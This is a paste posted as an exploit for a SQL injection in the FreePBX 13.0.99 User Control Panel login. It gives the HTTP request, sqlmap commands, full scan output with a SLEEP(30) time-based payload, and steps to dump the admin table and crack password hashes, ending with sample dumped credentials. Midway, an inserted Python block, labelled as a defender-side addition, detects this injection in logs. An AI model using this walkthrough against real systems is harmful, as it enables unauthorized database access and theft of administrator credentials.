FreePBX 13.0.99 SQL Injection "POST" USING SQLMAP

a guest
Oct 10th, 2016

# Exploit Title: [SQL Injection]
# Vendor: FreePBX
# Date: [2016-10-09]
# Exploit Author: [αԋɱҽԃ αмєяιcαη] ** Skype: AhmedAmerican_ **
# Vendor Homepage: [https://www.freepbx.org/]
# Tested Version: [FreePBX 13.0.99 ** Other versions may also be affected **]
# This task needs sqlmap: https://github.com/sqlmapproject/sqlmap/tarball/master


The following vulnerability was detected upon a manual POST request (HTTP headers below):
------------------------------------------------------------------------
POST /ucp/index.php HTTP/1.1
Host: http://target ip/ or http://target ip:port/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target ip/ucp/
Content-Length: 103
Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
------------------------------------------------------------------------

Basically, this release is affected by a POST-type SQL injection vulnerability in three parameters (username, password and email) of the User Control Panel (/ucp/).
Make sure the UCP is available before you start (example: http://TARGET IP/ucp/ or http://TARGET IP:PORT/ucp/).
Kindly be informed that each IP needs a new token in order for the POST data request to get through.
------------------------------------------------------------------------
After installing the sqlmap tool in your root directory:

Proof of Concept:

root@American# cd SQLMAP
root@American:/SQLMAP# nano 1.txt
(and insert into it):
POST /ucp/index.php HTTP/1.1
Host: http://target ip/ or http://target ip:port/
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target ip/ucp/
Content-Length: 103
Cookie: lang=en_US; PHPSESSID=igq9g1s6lurkpciojt4dabbu71; __utma=90705823.772463779.1476023139.1476023139.1476023139.1; __utmc=90705823; __utmz=90705823.1476023139.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Connection: keep-alive
token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login
File Name to Write: 1.txt [ Wrote 13 lines ]
root@American:/SQLMAP# ./sqlmap.py -r 1.txt -p "username,password,email"
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.0.10.19#dev}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:26:50
[20:26:50] [INFO] parsing HTTP request from '1.txt'
[20:26:50] [WARNING] the testable parameter 'username,password,email' you provided is not into the GET
[20:26:51] [INFO] using '/home/American/sqlmap/output/i had remove target ip/session' as session file
[20:26:52] [INFO] resuming injection data from session file
[20:26:52] [WARNING] there is an injection in POST parameter 'username,password,email' but you did not provided it this time
[20:26:52] [INFO] testing connection to the target url
[20:26:53] [INFO] testing if the url is stable, wait a few seconds
[20:26:55] [INFO] url is stable
[20:33:13] [INFO] testing if POST parameter 'username,password,email' is dynamic
[20:33:14] [INFO] confirming that POST parameter 'username,password,email' is dynamic
[20:33:14] [INFO] POST parameter 'username,password,email' is dynamic
[20:33:14] [INFO] heuristics detected web page charset 'ascii'
[20:33:14] [WARNING] reflective value(s) found and filtering out
[20:33:14] [WARNING] heuristic (basic) test shows that POST parameter 'username,password,email' might be injectable
[20:33:15] [INFO] testing for SQL injection on POST parameter 'username,password,email'
[20:33:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:18] [INFO] POST parameter 'username,password,email' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="the")
[20:33:18] [INFO] heuristics detected web page charset 'CP949'
[20:33:21] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:33:26] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:33:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[20:33:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:33:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[20:33:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:33:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:33:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:33:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:33:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:33:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
[20:33:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:33:30] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:33:31] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:33:31] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:33:31] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:33:31] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:33:31] [INFO] testing 'MySQL inline queries'
[20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:33:31] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[20:33:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:33:32] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:33:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:33:43] [INFO] POST parameter 'username,password,email' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[20:33:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:33:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:33:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:33:45] [INFO] target URL appears to have 14 columns in query
[20:33:56] [INFO] POST parameter 'username,password,email' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'username,email,password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: username,password,email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=1a543e82edd4d6a276ad0be4f1307822' AND SLEEP(30) -- &username=&password=&email=&quietmode=1&module=User&command=login rememberme=on ]
---
[20:33:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[20:33:59] [INFO] fetching database names
[20:34:00] [INFO] the SQL query used returns 2 entries
[20:34:00] [INFO] retrieved: information_schema
[20:34:00] [INFO] retrieved: FreePBX
available databases [2]:
[*] FreePBX
[*] information_schema
[20:34:00] [INFO] fetched data logged to text files under '/home/American/.sqlmap/output/i had removed target ip'
[*] shutting down at 20:34:01

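As an added defender-side example (not part of the original paste), the following Python flags UCP login POSTs that carry the time-based blind payload sqlmap reported above; the request records are constructed from the paste's POST body, and the /ucp/index.php path, the module/command field values and the 5-second slow-response threshold are assumptions.

```python
import re
from urllib.parse import parse_qs

# Injection markers matching what the sqlmap run above probed for: time-based
# (SLEEP/BENCHMARK), boolean-based (' AND / ' OR), comment terminators, UNION.
_SQLI_MARKERS = re.compile(
    r"(?i)(\bsleep\s*\(|\bbenchmark\s*\(|'\s*(and|or)\b|--\s|/\*|\bunion\s+select\b)"
)


def suspicious_fields(body):
    """Decode a form-encoded POST body and return {field: value} for every
    field whose value carries an injection marker (blank fields are kept so
    the UCP login fields username/password/email always appear)."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items() if _SQLI_MARKERS.search(v[0])}


def flag_ucp_login(record, slow_ms=5000):
    """Return the reasons a request record resembles the injection shown in
    the paste: a UCP login POST (module=User&command=login) whose token or
    credential fields contain SQL syntax, and/or a response slow enough to
    be consistent with SLEEP(n). slow_ms is an assumed threshold."""
    reasons = []
    if record["method"] != "POST" or record["path"] != "/ucp/index.php":
        return reasons
    fields = parse_qs(record["body"], keep_blank_values=True)
    if fields.get("module") != ["User"] or fields.get("command") != ["login"]:
        return reasons
    for name, value in suspicious_fields(record["body"]).items():
        reasons.append(f"sqli marker in '{name}': {value!r}")
    if record["duration_ms"] >= slow_ms:
        reasons.append(f"slow login response: {record['duration_ms']} ms")
    return reasons


# Constructed records modelled on the paste's POST body (not real traffic):
# a normal login, then the time-based probe sqlmap reported as its payload.
SAMPLE_RECORDS = [
    {"method": "POST", "path": "/ucp/index.php", "duration_ms": 120,
     "body": "token=1a543e82edd4d6a276ad0be4f1307822&username=alice&password=x"
             "&email=&quietmode=1&module=User&command=login"},
    {"method": "POST", "path": "/ucp/index.php", "duration_ms": 30210,
     "body": "token=1a543e82edd4d6a276ad0be4f1307822%27%20AND%20SLEEP%2830%29%20--%20"
             "&username=&password=&email=&quietmode=1&module=User&command=login"},
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec["duration_ms"], "ms:", flag_ucp_login(rec) or "clean")
```

Feed it records parsed from an access log that records the request body and %D/%T response time; a slow login with SQL syntax in any field is the signature of the run above.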
So now we are able to find the database names; next, you can browse the FreePBX database to find the admin table with the columns username, password and email, and then dump it.

e.g. -D FreePBX -T admin -C username,password,email --dump ; once you have the hashes, let sqlmap try to crack the password hashes, or crack them using any cracking site service.

Or you can run the command directly, without saving the POST request to a file, with the following command:

./sqlmap.py -u "http://ip or ip:port/ucp/" --data="token=1a543e82edd4d6a276ad0be4f1307822&username=&password=&email=&quietmode=1&module=User&command=login" -p "username,password" --dbs

You can set --level=3 --risk=3 in case you want to not stress the server.

And the result at the end will be:
+----------+----------------------------------+
| username | password                         |
+----------+----------------------------------+
| Admin    | 9dab701b830129f80a3a40a5280b944a |
| Saqisza  | 6sb84d072ba41784289c8fb2098458d0 |
+----------+----------------------------------+

Otherwise, post your own info which you want to log in with, and wait until the posting is done by sqlmap:
[token=27dfb08647231ad0ed08fd2bdab65fe1' AND SLEEP(30) -- username=American password=Letmego@ email=Ahmed.American@rocketmail.com rememberme=on ]


**************************SEE YOU ALL SOON αԋɱҽԃ αмєяιcαη *******************